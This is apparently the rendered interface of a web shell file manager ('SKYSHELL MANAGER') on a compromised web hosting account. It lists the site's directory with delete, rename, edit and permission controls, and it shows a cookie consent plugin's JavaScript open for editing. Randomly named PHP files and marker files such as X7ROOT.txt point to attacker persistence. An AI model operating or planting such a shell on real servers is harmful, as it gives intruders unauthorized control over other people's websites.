📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: consent.js
(function(){ window.addEventListener('cookieadmin_before_consent_display', function(){ if(cookieadmin_pro_handle_gpc()){ cookieadmin_policy.hide_banner = true; } }); })() function cookieadmin_pro_set_consent(prefrenc, days) { // Handling GPC override, preventing GPC signal if(cookieadmin_pro_vars && cookieadmin_pro_vars.respect_gpc){ if(!cookieadmin_pro_handle_set_gpc()){ return false; } } const data = 'action=cookieadmin_pro_ajax_handler&cookieadmin_act=save_consent' + '&cookieadmin_preference=' + encodeURIComponent(JSON.stringify(Object.keys(prefrenc))); let payload = data; if (cookieadmin_is_obj(cookieadmin_is_consent) && !!cookieadmin_is_consent.consent) { payload += '&cookieadmin_consent_id=' + cookieadmin_is_consent.consent; } // Make async request — don't block or wait const xhttp = new XMLHttpRequest(); xhttp.open('POST', cookieadmin_pro_vars.ajax_url, true); // true = async xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8'); xhttp.onload = function () { if(this.status === 200){ try { const parsed = JSON.parse(this.responseText); if (parsed.success && parsed.data && parsed.data.response) { cookieadmin_save_consent_cookie(prefrenc, days, parsed.data.response); // Showing override option if we have GPC enabled. if(cookieadmin_pro_vars && cookieadmin_pro_vars.respect_gpc){ var overrideEle = document.getElementById('cookieadmin_gpc_override'); if(overrideEle){ overrideEle.style.display = 'block'; } } } } catch (e) { console.error("Invalid JSON response:", e); } } }; xhttp.onerror = function () { console.error("AJAX request failed"); }; xhttp.send(payload); // Immediately return return true; } // Decided if GPC is enabled and if user has enabled the override when saving preference function cookieadmin_pro_handle_set_gpc(){ var consentData = cookieadmin_is_cookie("cookieadmin_consent"); if (consentData && consentData.respect_gpc) { var override = document.getElementById('cookieadmin-override_gpc'); if(!override || !override.checked){ alert(cookieadmin_pro_vars.gpc_alert ? cookieadmin_pro_vars.gpc_alert : 'Please accept override GPC before saving preference.'); return false; } } return true; } // GPC (Global Privacy Control) Detection and Handling function cookieadmin_pro_check_gpc(){ // Check if respect_gpc setting is enabled if(!cookieadmin_pro_vars || !cookieadmin_pro_vars.respect_gpc){ return false; } // Check navigator.globalPrivacyControl property (browser-level GPC signal) if(typeof navigator !== 'undefined' && typeof navigator.globalPrivacyControl !== 'undefined'){ if(navigator.globalPrivacyControl === true || navigator.globalPrivacyControl === 'true'){ return true; } } // Check if GPC was detected server-side (Sec-GPC header) if(cookieadmin_pro_vars && cookieadmin_pro_vars.gpc_enabled){ return true; } return false; } function cookieadmin_pro_handle_gpc(){ // Check if GPC is enabled and should be respected if(!cookieadmin_pro_check_gpc()){ return false; } // Handling visibility of Override option in Cookie Customizer modal var overRideEle = document.getElementById('cookieadmin_gpc_override'); var consentData = cookieadmin_is_cookie("cookieadmin_consent"); if(overRideEle){ overRideEle.style.display = (consentData && consentData.respect_gpc === true) ? '' : 'none'; } // Check if consent was already saved if(consentData){ return false; } // Apply auto-reject consent for GPC users // Only allow necessary/functional cookies, reject analytics and marketing const gpc_preferences = { 'functional': true, 'respect_gpc': true, }; // Set consent for 365 days cookieadmin_pro_set_consent(gpc_preferences, 365); // Show GPC honored message if banner element exists cookieadmin_pro_show_gpc_message(); return true; } function cookieadmin_pro_show_gpc_message() { var toast = document.getElementById('cookieadmin-gpc-toast'); if(!toast){ return; } closeBtn = toast.querySelector('button'); if(!closeBtn){ return; } // Add hover effects for the close button closeBtn.addEventListener('mouseenter', () => closeBtn.style.opacity = '1'); closeBtn.addEventListener('mouseleave', () => closeBtn.style.opacity = '0.7'); // Add click event to remove the toast with a fade-out animation closeBtn.addEventListener('click', () => { toast.style.opacity = '0'; toast.style.transform = 'translateY(20px)'; toast.style.transition = 'opacity 0.3s ease, transform 0.3s ease, visibility 0s 0.3s'; toast.style.visibility = 'hidden'; setTimeout(() => { if (document.body.contains(toast)) { document.body.removeChild(toast); } }, 300); // Wait for transition to finish }); // Trigger the fade-in animation requestAnimationFrame(() => { toast.style.visibility = 'visible'; toast.style.opacity = '1'; toast.style.transform = 'translateY(0)'; toast.style.transition = 'opacity 0.3s ease, transform 0.3s ease, visibility 0s'; }); // Auto-hide after 10 seconds setTimeout(() => { if(document.body.contains(toast)){ toast.style.opacity = '0'; toast.style.transform = 'translateY(20px)'; toast.style.transition = 'opacity 0.3s ease, transform 0.3s ease, visibility 0s 0.3s'; toast.style.visibility = 'hidden'; setTimeout(() => { if (document.body.contains(toast)) { document.body.removeChild(toast); } }, 300); } }, 10000); }
Save